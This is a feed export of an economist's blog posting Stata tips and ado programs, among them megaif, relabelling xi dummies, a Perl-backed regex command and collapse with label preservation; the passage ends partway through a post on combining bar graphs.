tag:blogger.com,1999:blog-27226716673904632662024-03-05T01:39:28.914-08:00Oh missionObservations on economic development and other random stuff.Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.comBlogger39125tag:blogger.com,1999:blog-2722671667390463266.post-48900783405736311442014-01-26T12:27:00.000-08:002014-01-26T12:27:21.622-08:00My ado files are all available on GitHub. The link is here: https://github.com/shafiquejamal/stata_ado_files<div dir="ltr" style="text-align: left;" trbidi="on">
My ado files are all available on GitHub. The link is here:<br />
<br />
<a href="https://github.com/shafiquejamal/stata_ado_files">https://github.com/shafiquejamal/stata_ado_files</a><br />
<br />
To get these files, visit the above link and click download zip (on the right).<br />
<br />
To get individual files, click on any of the files, and then click "Raw". You can then copy the text and past into your do file editor (e.g. https://raw.github.com/shafiquejamal/stata_ado_files/master/collapseandpreserve.ado)</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-36372024028829099372012-12-08T03:50:00.002-08:002012-12-08T03:55:42.108-08:00Stata tip: "Mega If" : a simple command to generate long if conditions<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you need to type the following command that has many conditions in the <span style="font-family: "Courier New",Courier,monospace;">if</span> condition:<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">replace group = 1 if (benefitNumber == 1 | benefitNumber == 2 | benefitNumber == 3 | benefitNumber == 4 | benefitNumber == 5 | benefitNumber == 6 | benefitNumber == 11 | benefitNumber == 12 | benefitNumber == 17 | benefitNumber == 19 | benefitNumber == 21 | benefitNumber == 22 | benefitNumber == 23) </span><br />
<br />
It's a bit much to type. The program <span style="font-family: "Courier New",Courier,monospace;">megaif</span> below will generate this long line from the much shorter command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">megaif 1 2 3 4 5 6 11 12 17 19 21 22 23, v(benefitNumber) c(replace group = 1)</span><br />
<br />
The above has lots of "or equals", but you can also generate lots of "and does not equal", for example:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">replace group = 1 if (benefitNumber != 1 & benefitNumber != 2 & benefitNumber != 3 & benefitNumber != 4 & benefitNumber != 5 & benefitNumber != 6 & benefitNumber != 11 & benefitNumber != 12 & benefitNumber != 17 & benefitNumber != 19 & benefitNumber != 21 & benefitNumber != 22 & benefitNumber != 23) </span><br />
<br />
using the following command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">megaif 1 2 3 4 5 6 11 12 17 19 21 22 23, v(benefitNumber) c(replace group = 1) e(!=) s(&)</span><br />
<br />
It works for numeric variables and for string variables too. Check this out:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">megaif "a b" b "cc" d `"e"', v(benefit_stringvar) c(replace group = 1) e(!=) s(&)</span><br />
<br />
executes the following command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">cmd to execute: replace group = 1 if (benefit_stringvar != "a b" & benefit_stringvar != "b" & benefit_stringvar != "cc" & benefit_stringvar != "d" & benefit_stringvar != "e") </span><br /><br />
As you can see, for string variables the quotes are optional unless you're checking for text that has a space in it. The program is below. Enjoy!<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define megaif<br /><br /> // By Shafique Jamal<br /> // e.g. <br /> // sysuse auto, clear<br /> // megaif 0 1, v(foreign) c(drop) e(~=) // this will drop all the observations. Just for illustrative purposes to show how the command could be used<br /> // another e.g.<br /> // The command:<br /> // megaif 14 15 16 17 18 19 20 21 22, c(gen priv1 = 1) var(income_type2)<br /> // would execute the following command:<br /> // gen priv1 = 1 if (income_type2 == "14" | income_type2 == "15" | income_type2 == "16" | income_type2 == "17" | income_type2 == "18" | income_type2 == "19" | income_type2 == "20" | income_type2 == "21" | income_type2 == "22") <br /><br /><br /> syntax anything(id="variable and values" name=arguments), Var(varname) Cmd(string) [Equality(string) Separator(string)]<br /> <br /> // The default is equality<br /> if ("`equality'" == "") {<br /> local equality "=="<br /> }<br /> <br /> if ("`separator'" == "") {<br /> local separator " | "<br /> }<br /> else {<br /> local separator " `separator' "<br /> }<br /> <br /> cap confirm numeric variable `var'<br /> if (_rc == 0) { // variable is numeric<br /> local numericvar = 1<br /> } <br /> else {<br /> local numericvar = 0<br /> }<br /> // di "numericvar = `numericvar'"<br /> <br /> local count = 0<br /> local orcondition ""<br /> foreach w of local arguments {<br /> local count = `count' + 1<br /><br /> // di `"w = `w'"'<br /> if (`numericvar' == 0) {<br /> local orcondition `"`orcondition'`orseparator'`var' `equality' "`w'""'<br /> }<br /> else {<br /> local orcondition `"`orcondition'`orseparator'`var' `equality' `w'"'<br /> }<br /> local orseparator "`separator'"<br /> }<br /> <br /> // di `"orcondition = `orcondition'"'<br /> di `"cmd to execute: `cmd' if (`orcondition') "'<br /> // set trace on<br /> // set traced 1<br /> `cmd' if (`orcondition')<br /> set trace off<br /><br />end</span><br />
<br />
<br />
<br /></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-56532217262341402492012-12-06T01:46:00.004-08:002012-12-07T11:23:36.895-08:00Stata tip: Quickly, and in one command, rename all variable labels of variables generated with the 'xi' command to reflect the value labels of the xi'd variable<div dir="ltr" style="text-align: left;" trbidi="on">
When you use the xi command on categorical variables, even on those that have a value label associated with them, you get this:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. xi: svy, subpop(rural): reg logpccd rural_regressors refrigerator car livingroomsper numchild11 numchild11_sq i.oblast i.typeofdwell i.roof i.coldwatermeterinstalled i.soc_</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. d</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">_Ioblast_3 byte %8.0g oblast==3<br />_Ioblast_4 byte %8.0g oblast==4<br />_Ioblast_5 byte %8.0g oblast==5<br />_Ioblast_6 byte %8.0g oblast==6<br />_Ioblast_7 byte %8.0g oblast==7<br />_Ioblast_8 byte %8.0g oblast==8<br />_Ioblast_11 byte %8.0g oblast==11<br />_Itypeofdwe_2 byte %8.0g typeofdwelling==2<br />_Itypeofdwe_3 byte %8.0g typeofdwelling==3<br />_Itypeofdwe_4 byte %8.0g typeofdwelling==4<br />_Itypeofdwe_5 byte %8.0g typeofdwelling==5<br />_Itypeofdwe_6 byte %8.0g typeofdwelling==6<br />_Itypeofdwe_7 byte %8.0g typeofdwelling==7<br />_Itypeofdwe_8 byte %8.0g typeofdwelling==8<br />_Itypeofdwe_9 byte %8.0g typeofdwelling==9</span><br />
<br />
The value labels are not much more informative than are the variable names. Below is a program that will automatically rename the variable label of these variables that result from the xi command so that they include the corresponding value label, as follows:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">_Ioblast_3 byte %8.0g oblast=Jalalabat<br />_Ioblast_4 byte %8.0g oblast=Naryn<br />_Ioblast_5 byte %8.0g oblast=Batken<br />_Ioblast_6 byte %8.0g oblast=Osh<br />_Ioblast_7 byte %8.0g oblast=City of Osh<br />_Ioblast_8 byte %8.0g oblast=Chui<br />_Ioblast_11 byte %8.0g oblast=City of Bishkek<br />_Itypeofdwe_2 byte %8.0g typeofdwelling=Apartment or room in a residential hotel<br />_Itypeofdwe_3 byte %8.0g typeofdwelling=Separate house<br />_Itypeofdwe_4 byte %8.0g typeofdwelling=Part of a house<br />_Itypeofdwe_5 byte %8.0g typeofdwelling=Dormitory<br />_Itypeofdwe_6 byte %8.0g typeofdwelling=Lodge or a tied cottage (temporary tenure dwelling)<br />_Itypeofdwe_7 byte %8.0g typeofdwelling=Other non-residential premises used for residence<br />_Itypeofdwe_8 byte %8.0g typeofdwelling=Other residential premises<br />_Itypeofdwe_9 byte %8.0g typeofdwelling=Barracks<br /> </span><br />
There are actually two programs - mine is a wrapper for a program that Nicholas J. Cox wrote. Both of these are below.<br />
<br />
Usage (run this after the <span style="font-family: "Courier New",Courier,monospace;">xi</span> command):<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. varsformyrelabel </span><br />
<br />
Programs:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define varsformyrelabel <br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com), 12-07-2012<br /> // UPDATE 12-07-2012: Need to change how the variable name for the list of `allunxidvariables' is determined. Need to get it from the variable label, rather than the variable name<br /> //<br /><br /> // Get list of variables that were xi'd<br /> local xivars "`_dta[__xi__Vars__To__Drop__]:'"<br /> // di `"xivars:`xivars'"'<br /> <br /> // Now just need to get list of un-xi'd variables from this list<br /> // Here is the first one<br /> local currentdummyvar : word 1 of `xivars'<br /> // di `"currentdummyvar:`currentdummyvar'"'<br /> <br /> // This will get the full variable name<br /> local currentunxidvar = regexr("`: variable label `currentdummyvar''","==.*$","")<br /> // di `"currentunxidvar:`currentunxidvar'"'<br /> local allunxidvars "`currentunxidvar'"<br /> // di `"allunxidvars:`allunxidvars'"'<br /> <br /> // This will get the _I`var' name, without the _# suffix - I need this for the first argument to the myrelabel routine. Variable name gets shortened<br /> local currentunxidvarwith_I = regexr("`currentdummyvar'","_[0-9]+$","")<br /> // di `"currentunxidvar:`currentunxidvarwith_I'"'<br /> local allunxidvarswith_I "`currentunxidvarwith_I'"<br /> // di `"allunxidvarswith_I:`allunxidvarswith_I'"'<br /> <br /> // Now loop through the rest<br /> local count = 0<br /> foreach var of local xivars { <br /> local count = `count' + 1<br /> if (`count' != 1) {<br /> local w : word `count' of `xivars'<br /> // di "w: `w'"<br /> <br /> // check whether the next xi'd var is related to the current one<br /> // if (regexm("`w'","^_I`currentunxidvar'_[0-9]+$")) { // yes, this is part of the same family as the current _I.... variable under consideration<br /> if (regexm("`: variable label `w''","^`currentunxidvar'==.*$")) { // yes, this is part of the same family as the current _I.... variable under consideration<br /> // di "skip"<br /> }<br /> else { // no, it is different. add to the list<br /> // this gets the full variable name<br /> local currentunxidvar = regexr("`: variable label `w''","==.*$","")<br /> // di `"currentunxidvar:`currentunxidvar'"'<br /> local allunxidvars "`allunxidvars' `currentunxidvar'"<br /> // di `"allunxidvars:`allunxidvars'"'<br /> <br /> // This gets the _Ivar name<br /> local currentunxidvarwith_I = regexr("`w'","_[0-9]+$","")<br /> // di `"currentunxidvar:`currentunxidvarwith_I'"'<br /> local allunxidvarswith_I "`allunxidvarswith_I' `currentunxidvarwith_I'"<br /> // di `"allunxidvarswith_I:`allunxidvarswith_I'"'<br /> } <br /> }<br /> }<br /><br /> di "allunixidvars: `allunxidvars'"<br /> di `"allunxidvarswith_I:`allunxidvarswith_I'"'<br /> local count = 0 <br /> foreach var of local allunxidvars {<br /> local count = `count' + 1<br /> local varwith_I : word `count' of `allunxidvarswith_I'<br /> myrelabel `varwith_I'_* `var'<br /> }<br /> <br />end</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program def myrelabel<br />*! NJC 1.0.0 15 July 2003<br /> version 7<br /> syntax varlist(numeric)<br /><br /> tokenize `varlist'<br /> local nvars : word count `varlist'<br /> local last ``nvars''<br /> local vallabel : value label `last'<br /> if "`vallabel'" == "" {<br /> di as err "`last' not labelled"<br /> exit 498<br /> }<br /><br /> local `nvars'<br /> local varlist "`*'"<br /><br /> foreach v of local varlist {<br /> local varlabel : variable label `v'<br /> local eqs = index(`"`varlabel'"', "==")<br /> if `eqs' {<br /> local value = real(substr(`"`varlabel'"', `eqs' + 2, .))<br /> if `value' < . {<br /> local label : label `vallabel' `value'<br /> label var `v' `"`last'=`label'"'<br /> }<br /> }<br /> }<br /><br />end</span><br />
<br />
</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com1tag:blogger.com,1999:blog-2722671667390463266.post-86310308946691304282012-12-03T00:32:00.003-08:002012-12-07T19:30:42.499-08:00Stata tip: Using perl compatible regular expressions (PCRE) in Stata<div dir="ltr" style="text-align: left;" trbidi="on">
UPDATE 12-07-2012: Thanks to Nicholas J Cox who the problem I was having with the <span style="font-family: "Courier New",Courier,monospace;">-marksample-</span> command. I replaced the code below with the new, fixed code. <br />
<br />
Stata's regular expression engine is too limited for my needs. I asked the statalist about how to change Stata's regular expression engine, <a href="http://www.stata.com/statalist/archive/2012-11/msg00661.html" target="_blank">but apparently it is not possible</a>. So I wrote a Stata program (.ado file) to call a perl script to run a regular expression on a variable.<br />
<br />
Matching and substitution are supported. Named captures/groups are not, but non-named captures (e.g. $1, $2, etc.) ARE supported. I think quantifiers are supported. Anyways, if it works as I think it should based on my design and testing, it should be a decent improvement over Stata's built-in regular expression engine (I hope they update it soon).<br />
<br />
You can download the perl script <a href="https://docs.google.com/open?id=0BwOJxAq1e-5UbFQ0NjVVOFN4azg" target="_blank">here</a>. Download it and place it in any directory - just remember the directory because you will have to specify when you call the program.<br />
<br />
The Stata program is <a href="https://docs.google.com/open?id=0BwOJxAq1e-5UeGxJYzN6SUh0NXM" target="_blank">here</a> and below. Put this in your personal ado folder.<br />
<br />
Usage:<br />
<br />
Match only:<br />
<span style="font-family: "Courier New",Courier,monospace;">pcre SOME_STRING_VARIABLE, re("/^(\d)(\w)/i") gen(NEW_VARIABLE_TO_BE_GENERATED) pa("/usr/local/ActivePerl-5.16/bin/")</span><br />
<br />
Substitution:<br />
<span style="font-family: "Courier New",Courier,monospace;">pcre SOME_STRING_VARIABLE, re("/^(\d)(\w)/gi") gen(NEW_VARIABLE_TO_BE_GENERATED) pa("/usr/local/ActivePerl-5.16/bin/") repl("firstone_$1_secondone_$2") </span><br />
<br />
Notes:<br />
<br />
1. The arguement for re() should be a regular expression enclosed in double quotes. You can use only the forward slash for a delimiter. Named captures/groups don't work yet (I can't figure out why. Any ideas?)<br />
<br />
2. The arguement for repl() should be the replacement part of s//THIS_PART/. It should be enclosed in double quotes. Do NOT include the forward slashes or any delimiters. Option modifiers do NOT go here. You can use backreferences $1, $2, etc. but NOT named groups/named captures (i.e. you can't use \g{1}, \g{name}, etc. The \g{} notation doesn't work at all).<br />
<br />
3. You can specify the path to your perl installation in pa() (Be sure to include the trailing forward slash). If you don't, it will use whatever version of perl is accessible from the command line in a terminal in whatever path this is run from.<br />
<br />
4. You should specify the path of the perl script that this program calls: stataregex.pl. You can download this from my blog: shafiquejamal.blogspot.com. The default is the /Applications/STATA12/ directory. Be sure to include the trailing forward slash.<br />
<br />
5. This will generate a binary/dummy variable the match was a success, and variables prefixed by this same variable name with _1, _2, _3 ... , _16 appended to store the named captures/groups. <br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">program define pcre<br /><br /> // 30101990<br /> // Written by Shafique Jamal (shafique.jamal@gmail.com), 01 Dec 2012. Use at own risk :-p<br /> //<br /> // This program allows the user to use perl compatible regular expressions on a (single) string VARIABLE (not a scalar string) for matching, obtaining captures from memory parenthesis, and<br /> // subsitutions. Its not perfect... I think it supports quantifiers, it does support options/option modifiers, but it does not support named captures/groups. <br /> //<br /> // Usage:<br /> //<br /> // Match only:<br /> // pcre SOME_STRING_VARIABLE, re("/^(\d)(\w)/i") gen(NEW_VARIABLE_TO_BE_GENERATED) pa("/usr/local/ActivePerl-5.16/bin/")<br /> // Substitution:<br /> // pcre SOME_STRING_VARIABLE, re("/^(\d)(\w)/gi") gen(NEW_VARIABLE_TO_BE_GENERATED) pa("/usr/local/ActivePerl-5.16/bin/") repl("firstone_$1_secondone_$2")<br /> //<br /> // Note:<br /> //<br /> // 1. The arguement for re() should be a regular expression enclosed in double quotes. You can use only the forward slash for a delimiter. Named captures/groups don't work yet (I can't <br /> // figure out why. Any ideas?)<br /> // 2. The arguement for repl() should be the replacement part of s//THIS_PART/. It should be enclosed in double quotes. Do NOT include the forward slashes or any delimiters. <br /> // Option modifiers do NOT go here. You can use backreferences $1, $2, etc. but NOT named groups/named captures (i.e. you can't use \g{1}, \g{name}, etc. The \g{} notation doesn't work at all). <br /> // 3. You can specify the path to your perl installation in pa() (Be sure to include the trailing forward slash). If you don't, it will use whatever version of perl is accessible from the command line in a terminal in whatever path this<br /> // is run from.<br /> // 4. You should specify the path of the perl script that this program calls: stataregex.pl. You can download this from my blog: shafiquejamal.blogspot.com <br /> // The default is the /Applications/STATA12/ directory. Be sure to include the trailing forward slash. <br /> // 5. This will generate a binary/dummy variable the match was a success, and variables prefixed by this same variable name with _1, _2, _3 ... , _16 appended to store the named captures/groups. <br /> // It will also store (NEW_VAR_NAME)_s to store the new string with the substitution<br /> //<br /> // Steps:<br /> // 1. generate a merge variable based on _n. This is to make sure that the newly generated variable matches up by observations with the argument variable<br /> // 2. outsheet the merge variable and the argument variable into a csv file<br /> // 3. read the file into memory using perl<br /> // 4. perform the reg exp mach querry on each observation. Store result (0 or 1) in an array, whose index is the observation number as given in the merge variable<br /> // 5. save a new datafile, with the orignal merge var, and the match results variable, with the variable names in the headings<br /> // 6. merge this <br /> //<br /> // 02-12-2012: go ahead and pass the full regular expression with delimiters and options in the option REgularexpression(string asis)<br /> // Next step: detect whether a variable or string is the first arguement<br /> //<br /> //<br /> //<br /> // 1. generate a merge variable based on _n. This is to make sure that the newly generated variable matches up by observations with the argument variable<br /> <br /> syntax varname(string) [if], GENerate(name) REgularexpression(string asis) [Perlprogramdirwithfinalslash(string asis) PAthroperlwithfinalslash(string asis) REPLacement(string asis)]<br /> version 9.1<br /> marksample touse, strok<br /> // di `"`0'"'<br /> <br /> // 2. outsheet the merge variable and the argument variable into a csv file<br /> tempvar mergevar<br /> tempname _m<br /> // tempname touse2<br /> tempfile tfoutsheet<br /> tempfile tfinsheet<br /> tempfile tfinsheed_dta<br /> gen `mergevar' = _n<br /> // for some reason, marksample is not working<br /> // gen `touse2' = 0<br /> // qui replace `touse2' = 1 `if'<br /> cap drop `generate'<br /> // this is the variable that will hold the string with subsitutions<br /> cap drop `generate'_*<br /> <br /> <br /> // count if `touse'<br /> // count if `touse2'<br /> // di `"`if'"'<br /> // list hhid `mergevar' `touse'<br /> <br /> // qui outsheet `mergevar' `varlist' `touse' using "tfoutsheet.csv", c replace<br /> qui outsheet `mergevar' `varlist' `touse' using "`tfoutsheet.csv'", c replace<br /> <br /> // check options passed<br /> if (`"`optionmodifiers'"'==`""') {<br /> local optionmodifiers `""'<br /> }<br /> <br /> // check for perl program directory<br /> if (`"`perlprogramdirwithfinalslash'"'==`""') {<br /> local perlprogramdirwithfinalslash "/Applications/STATA12/"<br /> }<br /> <br /> // 3. Perl operations. Need to supply arguments in this order: inputfilename outputfilename nameofnewvariablegenerated regularexpressionpattern regularexpressionoptions<br /> // shell `pathroperlwithfinalslash'perl -v<br /> // di `"shell `pathroperlwithfinalslash'perl "`perlprogramdirwithfinalslash'stataregex.pl" "`tfoutsheet.csv'" "`tfinsheet.csv'" "`generate'" `regularexpression'"'<br /> qui shell `pathroperlwithfinalslash'perl "`perlprogramdirwithfinalslash'stataregex.pl" "`tfoutsheet.csv'" "`tfinsheet.csv'" "`generate'" `regularexpression' '`replacement''<br /> <br /> preserve<br /> qui insheet using "`tfinsheet.csv'", c clear<br /> sort `mergevar'<br /> qui save `"`tfinsheed_dta'"', replace<br /> restore<br /> <br /> sort `mergevar'<br /> qui merge 1:1 `mergevar' using `"`tfinsheed_dta'"', gen(`_m')<br /> qui drop `_m'<br /> <br /> foreach var of varlist `generate'* {<br /> cap confirm numeric var `var'<br /> if (_rc == 0) {<br /> qui replace `var' = . if `touse' == 0<br /> }<br /> else {<br /> qui replace `var' = "" if `touse' == 0<br /> }<br /> } <br /><br />end program<br /></span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-10991923480329738362012-11-28T02:07:00.004-08:002012-12-02T21:53:06.773-08:00Stata tip: collapse dataset while preserving variable and value labels<div dir="ltr" style="text-align: left;" trbidi="on">
When I use the <span style="font-family: "Courier New",Courier,monospace;">collapse</span> command, I loose the variable and value labels associated with my variables. The following program does everything that the collapse command does, but preserves the variable and value labels. It also has an option to refrain from putting the <span style="font-family: "Courier New",Courier,monospace;">stat</span> in the variable label.<br />
<br />
Usage:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">collapseandpreserve hdff=zarpl time_id (last) obraz wouer=soc_st, by(hh_code resp) o</span><br />
<br />
Program: <br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">program define collapseandpreserve<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com).<br /> // This will collapse the dataset and preserve the variable and value labels. The syntax for using this is just like with the collapse command.<br /> // There is one additional optional option: show stat. If you add this option to the command (collapseandperserve ... ,by(...) omitstatfromvarlabel<br /> // then it will not show the statistic (i.e. (fist), (mean), (last), etc.) in the variable label<br /> <br /> syntax anything(id="variable and values" name=arguments equalok), by(string asis) [cw fast Omitstatfromvarlabel]<br /> version 9.1<br /> <br /> // save all the value labels<br /> tempfile tf<br /> label save using `"`tf'"', replace<br /> <br /> // get the list of variables to be collapse, and keep track of the value label - variable correspondence <br /> tempname precollapse_listofvars<br /> tempname postcollapse_listofvars<br /> tempname listofvaluelabels<br /> tempname valuelabelname<br /> tempname stat<br /> tempname oldvarname<br /> tempname newvarname<br /> local `stat' "(mean)"<br /> foreach a of local arguments {<br /> di `"word: `a'"'<br /> if (regexm(`"`a'"',"^\(.*\)$")) { // if there is something like (first), (mean), etc.<br /> local `stat' = `"`a'"' <br /> } <br /> else { // This is a variable. Store the associated variable label and value label name<br /> <br /> // What if there is an = in the term? then need two list of variables: a precollapse list and a postcollapse list<br /> if (regexm(`"`a'"',"^(.*)=(.*)$")) {<br /> // di "Regex match!"<br /> local `oldvarname' = regexs(2)<br /> // di "oldvarname: ``oldvarname''"<br /> local `newvarname' = regexs(1)<br /> // di "newvarname: ``newvarname''"<br /> }<br /> else {<br /> // di "NO regex match!"<br /> local `oldvarname' `"`a'"'<br /> // di "oldvarname: ``oldvarname''"<br /> local `newvarname' `"`a'"'<br /> // di "newvarname: ``newvarname''"<br /> }<br /> <br /> local `precollapse_listofvars' `"``precollapse_listofvars'' ``oldvarname''"'<br /> local `postcollapse_listofvars' `"``postcollapse_listofvars'' ``newvarname''"'<br /> local `valuelabelname' : value label ``oldvarname''<br /> tempname vl_``newvarname''<br /> local `vl_``newvarname''' : variable label ``oldvarname''<br /> if (`"``vl_``newvarname''''"' == `""') {<br /> local `vl_``newvarname''' `"``newvarname''"'<br /> }<br /> di `"omitstatfromvarlabel = `omitstatfromvarlabel'"'<br /> if (`"`omitstatfromvarlabel'"'==`""') {<br /> local `vl_``newvarname''' `"``stat'' ``vl_``newvarname''''"'<br /> di "not omitting"<br /> }<br /> else {<br /> local `vl_``newvarname''' `"``vl_``newvarname''''"'<br /> di "omitting"<br /> }<br /> <br /> if (`"``valuelabelname''"' == `""') { // variable has no value label<br /> local `listofvaluelabels' `"``listofvaluelabels'' ."'<br /> }<br /> else {<br /> local `listofvaluelabels' `"``listofvaluelabels'' ``valuelabelname''"'<br /> }<br /> }<br /> }<br /> <br /> collapse `arguments', by(`by') `cw' `fast'<br /> // macro list<br /> <br /> // retrieve the valuelabels<br /> qui do `"`tf'"'<br /> <br /> // reapply the variable labels and the value labels<br /> tempname count<br /> local `count' = 0<br /> di "------------------------------------------------"<br /> foreach var of local `postcollapse_listofvars' {<br /> di `"var: `var'"'<br /> di `"its variable label: ``vl_`var'''"'<br /> // reapply the variable labels<br /> local `count' = ``count'' + 1<br /> label var `var' `"``vl_`var'''"'<br /> <br /> // reapply the value labels<br /> local `valuelabelname' : word ``count'' of ``listofvaluelabels''<br /> if (`"``valuelabelname''"' != `"."') {<br /> label values `var' ``valuelabelname''<br /> }<br /> }<br />end program</span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-71018523144075375022012-11-27T20:23:00.001-08:002012-12-06T19:05:02.205-08:00Stata tip: Plotting simillar graphs on the same graph<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you want to make a bar graph of a variable, such as consumption, for two mutually exclusive groups such as males and females, represented by one categorical variable ("male"). This is easy enough: use the <span style="font-family: "Courier New",Courier,monospace;">graph bar</span> command with an <span style="font-family: "Courier New",Courier,monospace;">over()</span> option. What if you want to plot over two categorical variables, one within the other: for example you want to plot average consumption for males and females that are self-employed, and average consumption for males and females that are not self-employed. Easy enough, just include an extra <span style="font-family: "Courier New",Courier,monospace;">over()</span> option with the extra categorical variable. In this example, each over group is mutually exclusive: you are either male or female, but can't be both, and you are either self-employed or not self-employed, but can't be both. In this example, the variables in your dataset are:<br />
<br />
consumption, male, self-employed<br />
<br />
Suppose, however, that you want to essentially combine two separate graphs into one graph as follows: you want to plot average consumption over three categorical variables that are NOT mutually exclusive, so you don't want to plot one within the other. For example, imagine that you are considering three different policy options for awarding a social assistance benefits: the current policy ("currentpolicy"), alternative A ("alternative_a") and alternative B ("alternative_b"). Each mechanism divides the population into those who qualify and those who don't qualify for the social assistance benefit. Thus each policy option is represented in the data by a binary variable (a.k.a. a dummy variable, which is just a categorical variable with two levels: 0 for those who do not qualify and 1 for those who do qualify). Of the three policy options, the current policy is the least pro-poor, alternative A is more pro-poor (more of the benefits go to the poor), and alternative B is the most pro-poor. <br />
<br />
Now, the three policy options are not mutually exclusive. It is possible to qualify under all three policy options, to be excluded under all three policy options, or to qualify under only one or two of the policy options. This is not true of the groups self-employed and not self-employed, and of the groups male and female. Essentially, suppose you want to combine the first three graphs below onto the the same graph, as shown in the fourth graph:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVYt0EelUn1ljEeXoAJlB6gOVCoE_DdeGRcxkWkyA_3DPLB_g-HTZolEm0t_LQipU3aMkzAvzhumXIAKTLF1KJHpa2I9PipUqTwUAAc5BdMfF5SJdOHnbvjnNp4QFxg_WmDp1EDlntpUg/s1600/Graph_mean_11-14-2012_example_for_blogpost1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVYt0EelUn1ljEeXoAJlB6gOVCoE_DdeGRcxkWkyA_3DPLB_g-HTZolEm0t_LQipU3aMkzAvzhumXIAKTLF1KJHpa2I9PipUqTwUAAc5BdMfF5SJdOHnbvjnNp4QFxg_WmDp1EDlntpUg/s640/Graph_mean_11-14-2012_example_for_blogpost1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN-fuXyTdmSB6OqYfbh7pxJsLzTHkIjHZqVblh5htDM_venFGq-TFz0cmElcWHBaeJAS9WgMpjuXu1HEiPdFHwQNMl-6NvemCBoeVFqmyR5tVGYLHv9cfV0wd7MaVaH7x91H5fpH9WZ7s/s1600/Graph_mean_11-14-2012_example_for_blogpost2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN-fuXyTdmSB6OqYfbh7pxJsLzTHkIjHZqVblh5htDM_venFGq-TFz0cmElcWHBaeJAS9WgMpjuXu1HEiPdFHwQNMl-6NvemCBoeVFqmyR5tVGYLHv9cfV0wd7MaVaH7x91H5fpH9WZ7s/s640/Graph_mean_11-14-2012_example_for_blogpost2.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjMGyZjVrN-dfAIeXOOaRZhmWBaD6sB2t1-ODeRxVEntVHAuAWSiAZPpQVHSdazPOjbD2mwv5HvqOIK_LRL40BbQDlCwfr6sU-cB-S6RH28jZyMiRRF-3sWwi0NPIzA3x9EPGu-pD2IJ4/s1600/Graph_mean_11-14-2012_example_for_blogpost3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjMGyZjVrN-dfAIeXOOaRZhmWBaD6sB2t1-ODeRxVEntVHAuAWSiAZPpQVHSdazPOjbD2mwv5HvqOIK_LRL40BbQDlCwfr6sU-cB-S6RH28jZyMiRRF-3sWwi0NPIzA3x9EPGu-pD2IJ4/s640/Graph_mean_11-14-2012_example_for_blogpost3.png" width="640" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieLTIdxDv1jW2GLb-v3izza7DAw6lDoh207QdV5ybQUBYrUltteJwTpjLo7cXMuiTCHZlvzMECS-m2BRJcNS_3mkzj5p8XQvUWZ6VXWUEauxWIGwSysiEA9H0oBf0NuUnMTBZHn3y9Lns/s1600/Graph_mean_11-14-2012_example_for_blogpost.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieLTIdxDv1jW2GLb-v3izza7DAw6lDoh207QdV5ybQUBYrUltteJwTpjLo7cXMuiTCHZlvzMECS-m2BRJcNS_3mkzj5p8XQvUWZ6VXWUEauxWIGwSysiEA9H0oBf0NuUnMTBZHn3y9Lns/s640/Graph_mean_11-14-2012_example_for_blogpost.png" width="640" /></a></div>
<br />
<br />
The program below will do this. Make sure you have label values defined for the categorical values. Also note that:<br />
<br />
a) The value labels for each of the categories should have the same numbering (i.e. they should all be 0, 1, 2 or 0, 2, 5. It should not be the case that one has 0, 1, 3 and the other has 1, 3, 4).<br />
<br />
